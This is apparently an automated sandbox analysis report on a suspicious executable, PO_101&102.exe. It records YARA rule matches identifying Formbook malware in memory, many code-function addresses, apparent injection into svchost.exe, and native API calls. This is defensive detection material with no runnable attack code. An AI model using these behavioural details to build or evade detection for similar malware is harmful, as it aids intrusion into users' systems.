          Source: 10.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO_101&102.exe.45ada08.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO_101&102.exe.45ada08.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: PO_101&102.exe
          Source: PO_101&102.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 10.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO_101&102.exe.45ada08.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO_101&102.exe.45ada08.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.307243585.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.371409464.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.558614233.0000000002E40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.312254656.0000000004500000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.555083742.00000000001A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.559409706.0000000002F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.352889129.0000000007949000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.370759398.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.335987438.0000000007949000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.371246188.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.308236166.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_00FA0E25
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_0199D4E1
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_0199C2B0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_01999968
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_05A2D4E8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD27B0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD73F8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD8AB0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD1990
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD8080
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BDC0E8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD6818
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BDCBA8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD73CA
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BDBF08
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD8AA0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BDBA88
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD1982
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BDF8A0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BDA890
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BDBCE0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD680A
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07BD8070
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF0948
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF1030
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF3619
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF0E10
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF3628
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF1319
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF3B11
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF1328
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF3B20
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF1950
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF0938
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF1925
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF0040
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07DF0025
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00190E25
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00401030
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041E83A
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041DD3A
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041EDC6
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041E5DB
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00402D87
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00402D90
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041D5A6
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00409E60
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00402FB0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_00B00E25
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01644120
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162F900
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016FE824
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A830
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E1002
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F28EC
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016520A0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F20A8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163B090
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016CCB4F
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164AB40
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F2B28
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016D23E3
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E03DA
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EDBD2
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165ABD8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165EBB0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165138B
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164EB9A
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016DFA2B
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B236
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F22AE
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F1D55
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01620D20
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F2D07
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163D5E0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F25DD
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01652581
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E2D82
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016ED466
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B477
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163841F
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4496
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F1FF1
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016FDFCE
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01646E30
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016ED616
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0375ABD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0375EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03744120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0372F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0374A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0373B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03746E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03720D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0373D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03752581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E2D82
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037ED466
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0373841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_037E4496
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5E83A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F49E60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F42FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5E5DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F5D5A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F42D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_02F42D87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B150 appears 133 times
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: String function: 0162B150 appears 139 times
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041A40D NtReadFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041A48B NtClose,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0041A53C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01669840 NtDelayExecution,LdrInitializeThunk,
